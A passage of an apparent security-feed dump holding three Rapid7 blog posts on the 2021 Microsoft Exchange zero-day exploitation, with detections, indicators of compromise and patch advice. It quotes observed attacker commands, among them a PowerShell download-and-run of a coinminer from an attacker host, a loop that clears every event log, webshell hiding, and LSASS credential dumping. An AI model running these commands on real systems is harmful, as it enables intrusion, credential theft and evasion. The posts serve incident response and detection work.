Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\"\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n C:\\Windows\\System32\\cmd.exe /c =attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n attrib \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\<REDACTED_10_CHARACTER_STRING>.aspx\" +s +h\n C:\\Windows\\System32\\cmd.exe /c icacls \"c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\" /inheritance:r /grant:r Everyone:(OI)(CI)R\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Modification Of Files In Exchange Webroot\n\n### 7zip and NetSupport Manager attacker\n\nThis attacker used the [7zip](<https://www.7-zip.org/>) compression utility (renamed to MonitoringLog.exe) and the [NetSupport Manager](<https://www.netsupportsoftware.com/remote-control/>) remote access tool (client32.exe). These utilities were most likely retrieved by the script1.ps1 PowerShell script and located within a password-protected archive named Service.Information.rtf. Once extracted, these utilities were executed:\n \n \n c:\\windows\\system32\\cmd.exe dir C:\\Programdata\\\n c:\\windows\\system32\\cmd.exe /c powershell C:\\Programdata\\script1.ps1\n powershell C:\\Programdata\\script1.ps1\n C:\\ProgramData\\MonitoringLog.exe x -p<REDACTED_STRING> -y C:\\ProgramData\\Service.Information.rtf -oC:\\ProgramData\n ping -n 10 127.0.0.1\n c:\\windows\\system32\\cmd.exe /c C:\\Programdata\\MonitoringLog.cmd\n taskkill /Im rundll32.exe /F\n C:\\ProgramData\\NetConnections\\client32.exe\n ping -n 10 127.0.0.1\n taskkill /Im rundll32.exe /F\n c:\\windows\\system32\\cmd.exe /c tasklist /v\n tasklist /v\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Event log deletion and virtual directory creation attacker\n\nThis attacker created virtual directories within the existing webroot using the Microsoft utility [appcmd.exe](<https://docs.microsoft.com/en-us/iis/get-started/getting-started-with-iis/getting-started-with-appcmdexe>), and then cleared all event logs on the system using [wevtutl.exe](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil>):\n \n \n CMD C:\\Windows\\System32\\inetsrv\\appcmd.exe add vdir \"/app.name:Default Web Site/\" \"/path:/owa/auth/ /zfwqn\" /physicalPath:C:\\ProgramData\\COM\\zfwqn\n \n CMD /c for /f %x in ('wevtutil el') do wevtutil cl %x\n wevtutil el\n wevtutil cl <REDACTED_ALL_DIFFERENT_EVENT_LOGS>\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n * Attacker Technique - Clearing Event Logs With WEvtUtil\n\n### Webshell enumeration attacker\n\nThis attacker was seen executing encoded PowerShell commands to use the [type](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/type>) command to view the contents possible webshell files named outlooken.aspx seen used by HAFNIUM and other attackers. This could be someone looking to use the footholds placed by other attackers or even researchers using the same exploit to identify systems that have been successfully compromised based on the reported activity associated with HAFNIUM:\n \n \n cmd /c powershell -enc YwBtAGQALgBlAHgAZQAgAC8AYwAgACIAdAB5AHAAZQAgACIAIgBDADoAXABQAHIAbwBnAHIAYQBtACAARgBpAGwAZQBzAFwATQBpAGMAcgBvAHMAbwBmAHQAXABFAHgAYwBoAGEAbgBnAGUAIABTAGUAcgB2AGUAcgBcAFYAMQA1AFwARgByAG8AbgB0AEUAbgBkAFwASAB0AHQAcABQAHIAbwB4AHkAXABvAHcAYQBcAGEAdQB0AGgAXABvAHUAdABsAG8AbwBrAGUAbgAuAGEAcwBwAHgAIgAiACIA\n cmd /c powershell -enc dAB5AHAAZQAgACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AFwARQB4AGMAaABhAG4AZwBlACAAUwBlAHIAdgBlAHIAXABWADEANQBcAEYAcgBvAG4AdABFAG4AZABcAEgAdAB0AHAAUAByAG8AeAB5AFwAbwB3AGEAXABhAHUAdABoAFwAbwB1AHQAbABvAG8AawBlAG4ALgBhAHMAcAB4ACIA\n \n\nBase64 decoded strings:\n \n \n type \"C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\outlooken.aspx\"\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Coinminer dropper attacker\n\nSome attackers were seen using PowerShell to retrieve and execute coinminers.\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/m103w.zip -OutFile C:\\windows\\temp\\dsf.exe\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nAnd again with a slightly different filename to retrieved from:\n \n \n cmd.exe /c powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip -OutFile C:\\windows\\temp\\dsf.exe & C:\\windows\\temp\\dsf.exe RS9+cn_0 & del C:\\windows\\temp\\dsf.exe\n powershell.exe Invoke-WebRequest http://microsoftsoftwaredownload.com:8080/c103w-at.zip\n C:\\windows\\temp\\dsf.exe RS9+cn_0\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n### Simple reconnaissance attacker(s)\n\nSome attackers were seen performing extremely simple reconnaissance commands to gather more information about the host, processes, users, and systems within Active Directory:\n \n \n net group /domain\n net group \"Domain Computers\" /do\n net group \"Domain Users\" /do\n net group IntranetAdmins /do\n net user /domain\n systeminfo\n tasklist\n \n\nAnother example where only simple recon type commands were executed:\n \n \n whoami\n systeminfo\n systeminfo\n wmic product get name\n Wmic product get name\n \n\nInsightIDR Attacker Behavior Analytics that detect this attacker\u2019s activity:\n\n * Suspicious Process - Process Spawned By Outlook Web Access\n\n## Conclusions\n\nWhile there was widespread exploitation of these vulnerabilities in the wild, it does appear that this was the work of several different attackers with different motivations and skills. Rapid7 did even observe exploitation of the same victim by multiple different actors (HAFNIUM and coinminer drops) within a two-week timeframe. Several attackers used this vulnerability to gather passwords/hashes from victim systems en masse. This enabled them to gather data from several victims that would allow them access into various Active Directory services as long as those credentials gathered remain unchanged. \n\nThis dumping of credentials may have been done at this scale as the attackers were aware this activity would be discovered and the vulnerability would be patched very soon. This would potentially allow these attackers to continue to access these accounts even after the systems had been successfully patched. The level of escalation in use by HAFNIUM subsequent use by several other actors may point to the same exploit being shared or leaked. **At the time of this writing, Rapid7 has no definitive evidence of this and acknowledges that this statement is speculative.**\n\nBy continuing to analyze the behavior of attackers post-compromise to develop detections, it can greatly increase the likelihood to be notified of a breach. This is regardless of the method used to obtain the initial access to the victim environment. Additionally, these detections have longer lifespans and can be made available in a more timely manner than most indicators of compromise are shared in other types of public reporting.\n\n### Observed CVEs employed by attackers: \n\n\nCommon Vulnerabilities and Exposure | Description \n---|--- \nCVE-2018-18913 | Opera Search Order Hijacking Vulnerability <https://blog.lucideus.com/2019/02/opera-search-order-hijacking-cve-2018-18913.html> \nCVE-2021-26855 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26855> \nCVE-2021-26857 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26857> \nCVE-2021-26858 | Microsoft Exchange Server remote code execution <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26858> \nCVE-2021-27065 | Microsoft Exchange Server remote code execution <https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27065> \n \n### Observed IOCs employed by all attackers:\n\nType | Value \n---|--- \nFQDN | estonine.com \nFQDN | p.estonine.com \nFQDN | ipinfo.io \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\ \nFilepath | C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\Bin\\ \nFilepath | c:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\ \nFilepath | C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\Current\\themes\\resources\\ \nFilepath | C:\\Programdata\\ \nFilepath | C:\\ProgramData\\COM\\zfwqn\\ \nFilepath | C:\\root\\ \nFilepath | C:\\Users\\Public\\ \nFilepath | C:\\Users\\Public\\Opera\\ \nFilepath | C:\\Windows\\temp\\ \nFilename | 1.txt \nFilename | 2.bat \nFilename | 3.avi \nFilename | b.log \nFilename | c103w-at.zip \nFilename | client32.exe \nFilename | code \nFilename | curl.exe \nFilename | demo.dll \nFilename | discover.aspx \nFilename | dsf.exe \nFilename | error.aspx \nFilename | ErrorFF.aspx \nFilename | exshell.psc1 \nFilename | Flogon.aspx \nFilename | lsass.dump \nFilename | m103w.zip \nFilename | nvidia.msi \nFilename | opera_browser.dll \nFilename | opera_browser.exe \nFilename | opera_browser.png \nFilename | OutlookEN.aspx \nFilename | MonitoringLog.cmd \nFilename | MonitoringLog.exe \nFilename | p \nFilename | procdump64.exe \nFilename | Service.Information.rtf \nFilename | TimeoutLogout.aspx \nFilename | 2.bat \nFilename | script1.ps1 \nFilename | test.bat \nIP Address | 178.162.217.107 \nIP Address | 178.162.203.202 \nIP Address | 178.162.203.226 \nIP Address | 85.17.31.122 \nIP Address | 5.79.71.205 \nIP Address | 5.79.71.225 \nIP Address | 178.162.203.211 \nIP Address | 85.17.31.82 \nIP Address | 86.105.18.116 \nIP Address | 198.98.61.152 \nIP Address | 89.34.111.11 \nMD5 | 7a6c605af4b85954f62f35d648d532bf \nMD5 | e1ae154461096adb5ec602faad42b72e \nMD5 | b3df7f5a9e36f01d0eb0043b698a6c06 \nMD5 | c60ac6a6e6e582ab0ecb1fdbd607705b \nMD5 | 42badc1d2f03a8b1e4875740d3d49336 \nMD5 | c515107d75563890020e915f54f3e036 \nSHA1 | 02886f9daa13f7d9855855048c54f1d6b1231b0a \nSHA1 | c7f68a184df65e72c59403fb135924334f8c0ebd \nSHA1 | ab32d4ec424b7cd30c7ace1dad859df1a65aa50e \nSHA1 | ba9de479beb82fd97bbdfbc04ef22e08224724ba \nSHA1 | cee178da1fb05f99af7a3547093122893bd1eb46 \nSHA1 | 2fed891610b9a770e396ced4ef3b0b6c55177305 \nSHA-256 | b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff \nSHA-256 | d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09 \nSHA-256 | bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6 \nSHA-256 | 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87 \nSHA-256 | c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf \nSHA-256 | 076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26 \nURL | `http://103.212.223.210:9900/nvidia.msi` \nURL | `http://86.105.18.116/news/code` \nURL | `http://86.105.18.116/news/opera_browser.dll` \nURL | `http://86.105.18.116/news/opera_browser.exe` \nURL | `http://86.105.18.116/news/opera_browser.png` \nURL | ` http://89.34.111.11/3.avi` \nURL | `http://microsoftsoftwaredownload.com:8080/c103w-at.zip` \nURL | `http://microsoftsoftwaredownload.com:8080/m103w.zip` \nURL | `http://p.estonine.com/p?e` \nURL | http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn \nURL | http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn \n \n### References:\n\n * <https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>\n * <https://aka.ms/ExchangeVulns>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>\n * <https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html>\n * <https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-03-23T14:04:36", "type": "rapid7blog", "title": "Defending Against the Zero Day: Analyzing Attacker Behavior Post-Exploitation of Microsoft Exchange", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-18913", "CVE-2019-19781", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-23T14:04:36", "id": "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "href": "https://blog.rapid7.com/2021/03/23/defending-against-the-zero-day-analyzing-attacker-behavior-post-exploitation-of-microsoft-exchange/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nStarting February 27, 2021, Rapid7 has observed a notable increase in the exploitation of Microsoft Exchange through existing detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s Attacker Behavior Analytics (ABA). The Managed Detection and Response (MDR) identified multiple, related compromises in the past 72 hours. In most cases, the attacker is uploading an \u201ceval\u201d webshell, commonly referred to as a \u201cchopper\u201d or \u201cChina chopper\u201d. With this foothold, the attacker would then upload and execute tools, often for the purpose of stealing credentials. Further investigative efforts have identified overlap in attacker techniques and infrastructure.\n\n## **Summary**\n\nAt close to midnight UTC on February 27, 2021, Managed Detection and Response SOC analysts began observing alerts for the following ABA detections in InsightIDR:\n\n * Attacker Tool - China Chopper Webshell Executing Commands\n * Attacker Technique - ProcDump Used Against LSASS\n\nUpon further inspection of [Enhanced Endpoint Telemetry](<https://blog.rapid7.com/2020/10/15/introducing-enhanced-endpoint-telemetry-eet-in-insightidr/>) data produced by InsightAgent, Rapid7 analysts identified that attackers had successfully compromised several systems and noted that they were all on-premise Microsoft Exchange servers with web services accessible to the public Internet. Exposing web services to the public internet is a common practice for customers with on-premise instances of Microsoft Exchange to provide their users with email services over the web through Outlook Web Access (OWA). \n\nUsing Project Sonar, Rapid7's Labs team was able to identify how target-rich an environment attackers have to work with: Nearly 170,000 servers vulnerable to a different recent Exchange CVE (for which [proof-of-concept exploit code](<https://github.com/sourceincite/CVE-2021-24085>) is readily available) were exposed to the public internet. \n\n\n\nWith the compromise identified, our team of Customer Advisors alerted our customers to this activity. Meanwhile, our analysts quickly began performing deeper inspection of the logs uploaded to InsightIDR along with collecting additional forensic information directly from the compromised endpoints. Within a very short period of time, our analysts were able to identify how the attackers were executing commands, where they were coming from, and what tools they were using. This information allowed Rapid7 to provide proactive, actionable steps to our customers to thwart the attack . Additionally, our analysts worked jointly with our Threat Intelligence and Detection Engineering (TIDE) team to review the collected data for the purpose of immediately developing and deploying additional detections for customers.\n\nThree days later, on March 2, 2021, Microsoft acknowledged and [released information](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) on the exploitation of 0-day vulnerabilities in Microsoft Exchange by an actor they refer to as \"hafnium.\" They also released patches for Microsoft Exchange 2013, 2016 and 2019 ([CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>), [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>), [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>), as well as others).\n\nDespite this vulnerability being unknown to the public, Rapid7 was able to identify the attacker's presence on systems to help defend against the use of these 0-day exploits with our Attacker Behavior Analytics library.\n\n**Rapid7 recommends that everyone running Microsoft Exchange apply these patches immediately as they are being exploited in the wild by a sophisticated adversary.**\n\n## **Technical Analysis of Attacker Activity**\n\n 1. Automated scanning to discover vulnerable Exchange servers from the following DigitalOcean IP addresses:\n * 165.232.154.116\n * 157.230.221.198\n * 161.35.45.41\n\n2\\. Analysis of Internet Information Services (IIS) logs shows a POST request is then made from the scanning DigitalOcean IP to multiple paths and files:\n\n * /ecp/y.js\n * /rpc/\n * /owa/auth/signon.aspx\n * /aspnet_client/system_web/<random_name>.aspx\n * IIS Path ex: /aspnet_client/system_web/TInpB9PE.aspx\n * File system path ex: C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\TInpB9PE.aspx\n * /aspnet_client/aspnet_iisstart.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_iisstart.aspx\n * /aspnet_client/aspx_client.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspx_client.aspx\n * /aspnet_client/aspnet.aspx\n * File system path: C:\\inetpub\\wwwroot\\aspnet_client\\aspnet.aspx\n\nIn some cases, additional dynamic link libraries (DLLs) and compiled aspx files are created shortly after the webshells are first interacted with via POST requests in the following locations:\n\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\root\\\n * C:\\Windows\\Microsoft.NET\\Framework64\\<version>\\Temporary ASP.NET Files\\owa\\\n\n3\\. Next, a command executes, attempting to delete the \u201cAdministrator\u201d from the \u201cExchange Organization administrators\u201d group:\n\n * cmd /c cd /d C:\\\\\\inetpub\\\\\\wwwroot\\\\\\aspnet_client\\\\\\system_web&net group \"Exchange Organization administrators\" administrator /del /domain&echo [S]&cd&echo [E]\n\n4\\. With the command executed, and the webshell successfully uploaded, interaction with the webshell will begin from a different IP. \n\n * We have monitored interaction from 45.77.252[.]175\n\n5\\. Following the POST request, multiple commands are executed on the asset:\n\na. Lsass.exe dumping using procdump64.exe and C:\\Temp\\update.exe \n(MD5:[ f557a178550733c229f1087f2396f782](<https://www.virustotal.com/gui/file/173ac2a1f99fe616f5efa3a7cf72013ab42a68f7305e24ed795a98cb08046ee1/detection>)):\n\n * cmd /c cd /d C:\\\\\\root&procdump64.exe -accepteula -ma lsass.exe lsass.dmp&echo [S]&cd&echo [E]\n\nb. Reconnaissance commands:\n\n * whoami.exe\n * ping.exe\n * tasklist.exe\n * quser.exe\n * query.exe\n\n****Indicators Of Compromise (IOCs)****\n\nType | Value \n---|--- \nIP Address | 165.232.154.116 \nIP Address | 157.230.221.198 \nIP Address | 161.35.45.41 \nIP Address | 45.77.252.175 \nIP Address | 104.248.49[.]97 \nIP Address That Interacts with Uploaded Webshells | 194.87.69[.]35 \nURL | /ecp/y.js \nURL | /ecp/DDI/DDIService.svc/GetList \nURL | /ecp/DDI/DDIService.svc/SetObject \nURL | /owa/auth/errorEE.aspx \nURL | /owa/auth/logon.aspx \nURL | /owa/auth/errorFE.aspx \nURL | /aspnet_client/aa.aspx \nURL | /aspnet_client/iis \nURL | /iistart.aaa \nURL | /owa/iistart.aaa \nUser Agent | python-requests/2.25.1 \nUser Agent | antSword/v2.1 \n \n## **References**\n\n * <https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>\n * <https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>\n * <https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>\n * <https://github.com/microsoft/CSS-Exchange/tree/main/Security>\n\n## Update: March 7, 2021\n\nMicrosoft [published tools](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) to help identify servers potentially compromised by [HAFNIUM](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>). Upon review of the checks within the tools, Rapid7 identified the following additional pre-existing detections within InsightIDR\u2019s Attacker Behavior Analytics that would have alerted customers to this malicious actor in their environment:\n\n * Attacker Technique - PowerShell New-MailboxExportRequest (Created March 14, 2019)\n * Attacker Technique - PowerShell Remove-MailboxExportRequest (Created Dec. 15, 2020)\n * Attacker Technique - Compressing Mailbox With 7zip (Created Dec. 15, 2020)\n * Attacker Technique - PowerShell Download Cradles (Created Jan. 3, 2019)\n\nThese previously existing detections are based on observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response, and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration across the Detection and Response practice, we help ensure our clients continue to have coverage for the latest techniques being used by malicious actors.\n\n## Update March 18, 2021\n\nWidespread [exploitation of vulnerable on-premises Exchange servers](<https://blog.rapid7.com/2021/03/03/mass-exploitation-of-exchange-server-zero-day-cves-what-you-need-to-know/>) is ongoing. Microsoft has released a \"One-Click Exchange On-premises Mitigation Tool\" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended \"to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\" They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n_We'd like to extend a huge thank-you to everyone who helped contribute to this blog post: _\n\n * _Robert Knapp_\n * _Shazan Khaja_\n * _Lih Wern Wong _\n * _Tiffany Anders _\n * _Andrew Iwamaye _\n * _Rashmi Joshi_\n * _Daniel Lydon_\n * _Dan Kelly_\n * _Carlo Anez Mazurco_\n * _Eoin Miller_\n * _Charlie Stafford_\n * _The Rapid7 MVM Team_", "cvss3": {}, "published": "2021-03-03T00:41:04", "type": "rapid7blog", "title": "Rapid7\u2019s InsightIDR Enables Detection And Response to Microsoft Exchange Zero-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-24085", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T00:41:04", "id": "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "href": "https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-18T14:50:05", "description": "\n\nOn March 2, 2021, the Microsoft Threat Intelligence Center (MSTIC) [released details on an active state-sponsored threat campaign](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) exploiting four zero-day vulnerabilities in on-premises instances of Microsoft Exchange Server. MSTIC attributes this campaign to HAFNIUM, a group \u201cassessed to be state-sponsored and operating out of China.\u201d\n\nRapid7 detection and response teams [have also observed increased threat activity](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>) against Microsoft Exchange Server since Feb. 27, 2021, and can confirm ongoing mass exploitation of vulnerable Exchange instances. Microsoft Exchange customers **should apply the latest updates on an emergency basis** and take immediate steps to harden their Exchange instances. We strongly recommend that organizations monitor closely for suspicious activity and indicators of compromise (IOCs) stemming from this campaign. Rapid7 has a comprehensive list of [IOCs available here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>).\n\nThe actively exploited zero-day vulnerabilities disclosed in the MSTIC announcement as part of the HAFNIUM-attributed threat campaign are:\n\n * **[CVE-2021-26855](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)**, also known as [Proxylogon](<https://proxylogon.com/>), is a server-side request forgery (SSRF) vulnerability in Exchange that allows an attacker to send arbitrary HTTP requests and authenticate as the Exchange server. According to Orange Tsai, the researcher who discovered the vulnerabilities, CVE-2021-26855 allows code execution when chained with CVE-2021-27065 (see below). A successful exploit chain would allow an unauthenticated attacker to "execute arbitrary commands on Microsoft Exchange Server through only an open 443 port." More information and a disclosure timeline are available at <https://proxylogon.com>.\n * **[CVE-2021-27065](<https://attackerkb.com/topics/lLMDUaeKSn/cve-2021-27065?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. An attacker who can authenticate with the Exchange server can use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n * **[CVE-2021-26857](<https://attackerkb.com/topics/hx6O9H590s/cve-2021-26857?referrer=blog>)** is an insecure deserialization vulnerability in the Unified Messaging service. Insecure deserialization is where untrusted user-controllable data is deserialized by a program. Exploiting this vulnerability gives an attacker the ability to run code as SYSTEM on the Exchange server. This requires administrator permission or another vulnerability to exploit.\n * **[CVE-2021-26858](<https://attackerkb.com/topics/TFFtD6XA8z/cve-2021-26858?referrer=blog>)** is a post-authentication arbitrary file write vulnerability in Exchange. If an attacker could authenticate with the Exchange server, they could use this vulnerability to write a file to any path on the server. They could authenticate by exploiting the CVE-2021-26855 SSRF vulnerability or by compromising a legitimate admin\u2019s credentials.\n\nAlso included in the out-of-band update were three additional remote code execution vulnerabilities in Microsoft Exchange. These additional vulnerabilities are not known to be part of the HAFNIUM-attributed threat campaign but should be remediated with the same urgency nonetheless:\n\n * **[CVE-2021-26412](<https://attackerkb.com/topics/mgKIUMCadN/cve-2021-27078?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n * **[CVE-2021-26854](<https://attackerkb.com/topics/KxXhEt74SK/cve-2021-26412?referrer=blog>)** (CVSS:3.0 6.6 / 5.8)\n * **[CVE-2021-27078](<https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855?referrer=blog>)** (CVSS:3.0 9.1 / 8.2)\n\nMicrosoft has released out-of-band patches for all seven vulnerabilities as of March 2, 2021. Security updates are available for the following specific versions of Exchange:\n\n * Exchange Server 2010 (for Service Pack 3\u2014this is a Defense in Depth update)\n * Exchange Server 2013 (CU 23)\n * Exchange Server 2016 (CU 19, CU 18)\n * Exchange Server 2019 (CU 8, CU 7)\n\nExchange Online is not affected.\n\n## For Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to these vulnerabilities with authenticated vulnerability checks. Customers will need to perform a console restart after consuming the content update in order to scan for these vulnerabilities.\n\nInsightIDR will generate an alert if suspicious activity is detected in your environment. The Insight Agent must be installed on Exchange Servers to detect the attacker behaviors observed as part of this attack. If you have not already done so, [install the Insight Agent](<https://docs.rapid7.com/insight-agent/install/>) on your Exchange Servers.\n\nFor individual vulnerability analysis, [see AttackerKB](<https://attackerkb.com/topics/Sw8H0fbJ9O/multiple-microsoft-exchange-zero-day-vulnerabilities---hafnium-campaign?referrer=blog#rapid7-analysis>).\n\n## Updates\n\n**Update March 18, 2021:** Microsoft has released a "One-Click Exchange On-premises Mitigation Tool" (EOMT.ps1) that may be able to automate portions of both the detection and patching process. Microsoft has said the tool is intended "to help customers who do not have dedicated security or IT teams to apply these security updates...This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update." They have tested the tool across Exchange Server 2013, 2016, and 2019 deployments. See Microsoft's blog on the tool for details and directions: <https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>\n\nWe continue to encourage on-premises Exchange Server users to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 15, 2021:** There are now multiple reports of [ransomware](<https://twitter.com/phillip_misner/status/1370197696280027136>) being used after initial compromise of unpatched Exchange servers. Microsoft [has confirmed](<https://twitter.com/MsftSecIntel/status/1370236539427459076>) that it is detecting and blocking a new ransomware strain it calls DearCry. On-premises Exchange customers should continue to prioritize patching and monitoring for indicators of compromise on an emergency basis.\n\n**Update March 7, 2021:** Widespread [exploitation and compromise](<https://twitter.com/GossiTheDog/status/1366894548593573893>) of Exchange servers is ongoing. CISA, the U.S. Cybersecurity and Infrastructure Agency, [said on March 6, 2021](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that they are "aware of widespread domestic and international exploitation of these vulnerabilities." Microsoft has [published a script](<https://github.com/microsoft/CSS-Exchange/blob/cb550e399bc2785e958472e533147826e2b6bf24/Security/Test-ProxyLogon.ps1>) to help identify some vulnerable versions of Exchange. Because there is [some potential for false negatives](<https://github.com/microsoft/CSS-Exchange/issues/107>), we recommend using this script as a supporting tool rather than as a primary way of confirming vulnerability. Defenders should check the version of Exchange they're running and compare against the known vulnerable versions Microsoft has identified. (Those running older, unsupported versions of Exchange should consider updating as a best practice.)\n\nOn-premises Exchange administrators should continue to treat this widespread threat as an incident response scenario and examine their environments for signs of compromise. Rapid7 has [a list of IOCs here](<https://blog.rapid7.com/2021/03/03/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day/>), which we will continue to update as new information becomes available. 